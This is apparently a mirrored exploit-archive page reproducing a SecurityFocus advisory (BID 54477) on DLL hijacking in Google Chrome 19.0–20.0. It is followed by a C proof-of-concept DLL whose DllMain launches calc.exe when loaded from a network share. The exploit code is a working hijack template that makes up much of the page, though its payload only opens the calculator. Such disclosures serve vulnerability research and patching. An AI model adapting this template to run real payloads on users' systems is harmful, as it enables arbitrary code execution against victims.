扫码分享
验证:
体验盒子/*
source: https://www.securityfocus.com/bid/54477/info
Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.
Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.
Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it.
*/
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
(HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}
体验盒子
